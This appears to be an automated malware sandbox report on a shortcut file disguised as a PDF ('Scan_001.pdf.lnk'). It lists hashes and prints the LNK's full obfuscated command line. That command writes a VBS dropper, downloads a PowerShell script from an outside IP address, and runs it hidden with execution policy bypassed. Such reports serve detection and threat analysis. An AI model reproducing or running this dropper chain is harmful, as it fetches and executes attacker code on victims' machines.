Malicious
Malicious
Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
55233b00b087d7545387494259c66b9a
Sha1
45e4f0edaff89a9af354dac709681399efd9cf80
Sha256
33df08276de56d21e1f2b82205ef14a1f51570a9b2aaae65b26b922c0942a9fc
Sha384
0c2af9abe944225ad8a711b98d4d1d1d703af27c220f029a85e69c2e02b14359b270f9a926bc74af27805452102c5ad0
Sha512
85b5f89ae99825ae6808752f8e9c84e2607d4f440f41a76161f646e0e711ee9de5ce5e1a7289a68854bd485bf6d088cd2d924bff14e0291e9077bd43a619604f
SSDeep
24:8d/jZusvqU3iXnSpVT6g4uNBxb1En989MBTRrrUb:8lj/C7XnSpEHkb1Uuc
TLSH
68729A8132F80300F5B6BF35DB3AAB85093AB980ED71C75C8D508C5D2864612EE72F76
File Structure
Scan_001.pdf.lnk
Malicious
LNK CommandLine
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary].deobfuscated.vbs
Malicious
Artefacts
Name
 Value
LNK: Command Execution

cmd.exe /v /c "set "a=&" && set "v1=MSXM" && set "v2=L2.XML" && set "o1=ADOD" && set "o2=B.S" && echo Set h=CreateObject("!v1!" ^!a! "!v2!HTTP"):h.open "GET","http://193.169.194.40/S7yhd67/sleepforebear.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("!o1!" ^!a! "!o2!tream"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\psISsh.ps1",2 > %TEMP%\sGd.vbs && cscript //b %TEMP%\sGd.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\psISsh.ps1 & del %TEMP%\sGd.vbs"
Deobfuscated PowerShell

& Remove-Item "%TEMP%\sGd.vbs"
URLs in VB Code - #1

http://193.169.194.40/S7yhd67/sleepforebear.ps1
Deobfuscated PowerShell

& Remove-Item "%TEMP%\sGd.vbs IconLocation: imageres.dll"
Scan_001.pdf.lnk (16.49 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙